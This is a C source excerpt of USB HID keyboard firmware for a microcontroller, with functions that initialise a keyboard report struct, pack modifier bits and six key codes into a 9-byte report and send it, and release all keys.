TM_USB_HIDDEVICE_Status_t TM_USB_HIDDEVICE_KeyboardStructInit(TM_USB_HIDDEVICE_Keyboard_t* Keyboard_Data) {
   /* Set defaults */
   Keyboard_Data->L_CTRL = TM_USB_HIDDEVICE_Button_Released;
   Keyboard_Data->L_ALT = TM_USB_HIDDEVICE_Button_Released;
   Keyboard_Data->L_SHIFT = TM_USB_HIDDEVICE_Button_Released;
   Keyboard_Data->L_GUI = TM_USB_HIDDEVICE_Button_Released;
   Keyboard_Data->R_CTRL = TM_USB_HIDDEVICE_Button_Released;
   Keyboard_Data->R_ALT = TM_USB_HIDDEVICE_Button_Released;
   Keyboard_Data->R_SHIFT = TM_USB_HIDDEVICE_Button_Released;
   Keyboard_Data->R_GUI = TM_USB_HIDDEVICE_Button_Released;
   Keyboard_Data->Key1 = 0;
   Keyboard_Data->Key2 = 0;
   Keyboard_Data->Key3 = 0;
   Keyboard_Data->Key4 = 0;
   Keyboard_Data->Key5 = 0;
   Keyboard_Data->Key6 = 0;

   /* Return currect status */
   return TM_USB_HIDDEVICE_INT_Status;
}

TM_USB_HIDDEVICE_Status_t TM_USB_HIDDEVICE_KeyboardSend(TM_USB_HIDDEVICE_Keyboard_t* Keyboard_Data) {
   uint8_t buff[9] = {0, 0, 0, 0, 0, 0, 0, 0, 0};; /* 9 bytes long report */

   /* Check status */
   //if (TM_USB_HIDDEVICE_INT_Status != TM_USB_HIDDEVICE_Status_Connected) {
   //   return TM_USB_HIDDEVICE_Status_Disconnected;
   //}

   /* Report ID */
   buff[0] = 0x01; /* Keyboard */

   /* Control buttons */
   buff[1] = 0;
   buff[1] |= Keyboard_Data->L_CTRL    << 0;   /* Bit 0 */
   buff[1] |= Keyboard_Data->L_SHIFT    << 1;   /* Bit 1 */
   buff[1] |= Keyboard_Data->L_ALT    << 2;   /* Bit 2 */
   buff[1] |= Keyboard_Data->L_GUI    << 3;   /* Bit 3 */
   buff[1] |= Keyboard_Data->R_CTRL    << 4;   /* Bit 4 */
   buff[1] |= Keyboard_Data->R_SHIFT    << 5;   /* Bit 5 */
   buff[1] |= Keyboard_Data->R_ALT    << 6;   /* Bit 6 */
   buff[1] |= Keyboard_Data->R_GUI    << 7;   /* Bit 7 */

   /* Padding */
   buff[2] = 0x00;

   /* Keys */
   buff[3] = Keyboard_Data->Key1;
   buff[4] = Keyboard_Data->Key2;
   buff[5] = Keyboard_Data->Key3;
   buff[6] = Keyboard_Data->Key4;
   buff[7] = Keyboard_Data->Key5;
   buff[8] = Keyboard_Data->Key6;

   /* Send to USB */
   USBD_HID_SendReport(&hUsbDeviceFS, buff, 9);
   HAL_Delay(SHORT_DELAY);
   /* Return connected */
   return TM_USB_HIDDEVICE_Status_Connected;
}

/*
 *
 */
TM_USB_HIDDEVICE_Status_t TM_USB_HIDDEVICE_KeyboardReleaseAll(void) {
   uint8_t buff[9] = {0, 0, 0, 0, 0, 0, 0, 0, 0}; /* 9 bytes long report */

   /* Check status */
   //if (TM_USB_HIDDEVICE_INT_Status != TM_USB_HIDDEVICE_Status_Connected) {
   //   return TM_USB_HIDDEVICE_Status_Disconnected;
   //}

   /* Report ID */
   buff[0] = 0x01; /* Keyboard */

   /* Send to USB */
   USBD_HID_SendReport(&hUsbDeviceFS, buff, 9);
   HAL_Delay(SHORT_DELAY);
   /* Return connected */
   return TM_USB_HIDDEVICE_Status_Connected;
}
